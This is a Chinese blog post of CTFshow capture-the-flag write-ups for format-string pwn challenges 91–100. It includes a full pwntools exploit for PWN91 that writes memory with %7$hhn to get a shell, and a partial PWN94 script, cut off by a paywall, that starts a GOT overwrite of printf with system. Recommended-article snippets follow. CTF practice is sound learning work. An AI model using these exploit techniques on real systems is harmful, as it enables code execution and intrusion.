CTFshow---格式化字符串[91-100]更新完毕

原创 已于 2024-09-23 13:09:52 修改 · 1.4k 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2024-09-20 22:56:43 首次发布

PWN91

简单的格式化字符串。
通过反汇编代码可以看出只要 daniu==6就能getshell
通过调试可以看到偏移为7
芜湖
最终exp为

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show", 28221)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

ru(b"    * *************************************                           ")
daniu = 0x0804B038

payload = p32(daniu)+b"%2c%7$hhn"

# gdb.attach(io)

sl(payload)



itr()

PWN92

运行直接输入%s,就能拿flag

PWN93

这里演示了各种基本用法,gdb调试跟进就可以了。我这里没调试,直接看了汇编代码。
输入7拿flag

PWN94

基础格式化
这些数据都可以通过调试算出来。

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='i386', os='linux')
# context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28238)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

ru(b"    * *************************************                           ")


system_addr = elf.plt['system']
printf_got = elf.got['printf']

payload = p32(printf_got+2)
最低0.47元/天 解锁文章
〖Python零基础入门篇⑳〗- 字符串格式化
易编橙 · 终身成长社群,相遇已是上上签!
02-27 4万+
什么是字符串格式化?一个固定字符串中有部分成员(元素)会根据变量的值的改变而改变的字符串,这就是字符串格式化
PWN学习之格式化字符串及CTF常见利用手法
蚁景网安学院
02-18 1628
格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中 printf、sprintf、fprintf 等函数用于将数据格式化字符串并进行输出。当这些函数的格式字符串参数(比如 %s、%d等)由用户提供时,如果未正确地对用户提供的输入进行验证和过滤,就可能存在格式化字符串漏洞。
ctfshow-web91(php特性)
m0_62094846的博客
01-13 791
正则:会出现/ / 有时候也会有^ $ 考察了preg_match的/m模式 im模式是可以匹配很多行 i模式只能匹配一行 %0a换行,相当于enter <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:16:09 # @link: http
CTFshow php特性 web91
Kradress的博客
12-13 884
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:16:09 # @link: https://ctfer.com */ show_source(__FILE__); include('flag.php'); $a=$_
ctfshow web入门 PHP特性学习笔记91
Hezhoutheone的博客
11-15 2521
web 91 payload: ?cmd=php%0a1 show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo $flag; } } else{ echo 'nonononono.
CTFshow-pwn入门-pwn91入手格式化字符串
Claire_cat的学习记录
08-11 458
write_size 表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn写,防止题目容器崩溃,我们用默认单字节写。的地址最先传入,那么这个地址就会在第 printf 函数的第 7 个参数的位置上。,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。是有偏移的,最先传入的参数并不会老老实实放在栈上第一个位置上。两字节,一共 6 字节,也就是在第 7 个参数指向的地方写入。找到写入的地址,也就是。
CTFShow-MISC入门篇详细wp(1-56)_ctfshow misc入门
2401_84297455的博客
04-28 1389
magicexif元数据编辑器是一款非常专业的照片magicexif元数据编辑器,该软件可以通过分析照片的元数据以及编码特征来计算图像可信度,从而判断照片是否被修改,同时还能对相机的快门次数、镜头参数、光圈档位等进行查看和编辑。
[golang]-go中字符串格式化与fmt包简介
农家小舍
01-30 2694
文章目录格式化符通用指针数值字符串与字节序列宽度与精度标识符占位符格式化错误GoStringer & StringerScanningPrintingErrorf fmt包中实现了格式化的I/O函数(类似C语言中的printf和scanf,但更加简单)。字符串相关操作参见《go中字符串操作和转换简介》。 格式化符 对于复杂类型,默认按以下规则打印: struct: {field0 field1 …} array, slice: [elem0 elem1 …] maps: map[key1:valu
安全漏洞--字符串格式化(FSV)漏洞分析
关注互联网安全的小虾米一枚
04-17 5167
一 漏洞简介   格式化字符串漏洞(format string vulnerability),也是一种比较常见的漏洞类型。常出现于c语言格式化字符串一系列函数。比如printf,sprintf,fprintf等一系列家族函数。由于此函数对参数类型和个数过滤不严格,导致用户可以构造 任意数据,实现读取写入内存数据,从而实现代码执行。 二 原理分析 至于为什么会产生字符串溢出漏洞呢,我们来看看产生溢出的关键函数。比如说 _C
格式化字符串漏洞
ylcangel的专栏
10-30 3066
格式化字符串漏洞 github地址:https://github.com/ylcangel/exploits/tree/master/fmtstr 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32 位 内核版本:Linux 2.6.32-754.10.1.el6.i686...
iOS Swift入门-字符串格式化
博来品
01-10 6136
字符串格式化 1、单个变量格式化 1.1、字符串类型格式化 let str = "lazy" print(String(format:"%@ boy", arguments:[str]))//输出结果:lazy boy 1.2、Number类型格式化 let num = 10 print(String(format:"%d 个", arguments:[num]))/
ctfshow刷题笔记(pwn篇)
Gygert的博客
03-16 4278
一入pwn坑深似海,从此web是路人 目录pwn02pwn03 pwn02 常规checksec一下 扔进IDA 点进pwnme()函数看看,明显的栈溢出 搜索字符串有/bin/sh 直接淦它 from pwn import* io=remote('111.231.70.44',28054) #io=process('./pwn02') bin_sh=0x0804850F payload=b'a'*13+p32(bin_sh) io.sendline(payload) io.interactive(
CTFSHOW_WEB入门1-112
bys617120的博客
01-02 1910
gitsvnhg对于此类题目应该比较敏感网站备份信息泄露.zip.rar.7z.tar,gzbak.swp.txt···
CTFshow-pwn入门-前置基础pwn13-pwn19
2301_80976241的博客
12-06 1455
题目提示我们使用gcc直接编译,然后运行可执行文件即可得到flag。因此我们gcc编译一下。得到flag:ctfshow{hOw_t0_us3_GCC?
CTFSHOW Pwn94 WP
qq_33348179的博客
05-30 262
存在system函数 用格式字符串漏洞 fmtstr_payload工具 劫持printf GOT为system PLT函数。可以进行多次的printf。32位 保护只开了NX。
CTFSHOW pwn94 WP(手工地址写)
qq_33348179的博客
07-21 244
print一下system函数的plt,可以知道地址为0x08048400,以及调试测得偏移为6。之前已经写了个利用fmtstr_payload打法pwn94的exp,这次尝试用手写的方式打通。0x0804的10进制为2052,如果要写入的话就要:%2052c%x$hn。知道了%c还会累计前面的字符。
ctfshow pwn 04
A2247328295的博客
04-13 899
接下来在第一个黄框位置下断点和printf函数处下断点,该断点为了查看canary的值,然后在printf()函数处下断点,该断点是为了查看canary在printf()函数处偏移,然后直接run。格式化字符串漏洞简单来说就是,由于printf函数不安全的使用造成的,%n是不安全的,还有printf(a)直接输出字符串也是不安全的,我们可以通过该漏洞获取canary泄露。黄框的地方是重点,第一个黄框为canary的插入,第二个为printf()函数的调用,第三个为canary的检验。
CTFshow-pwn入门-格式化字符串pwn91~100)WP
最新发布
Claire_cat的学习记录
08-24 1246
CTFshow-pwn入门-格式化字符串详细解题方法
CTFSHOW|pwn-数学99-wp
l2645470582_的博客
11-08 1127
1.检查保护机制 2.我们用64位的IDA打开该文件 查找关键字符串看到有“cat flag” 3.我们先预览一遍程序 main函数 我们看到要if语句里面的三个函数条件为真 第一个函数 第二个函数 第三个函数 在第三个函数里面条件为真就可以拿到flag(handler) 4.第一个函数:sub_9C0() 条件: 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1 所以8 --...
全面的User-Agent字符串集合
对于移动应用开发者,User-Agent字符串还能用于识别安装的应用版本,以便进行更新提示或数据分析。 这份User-Agent大全对JavaScript开发者尤其有价值,它能提供详尽的设备和浏览器识别依据,从而实现更加精细化的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值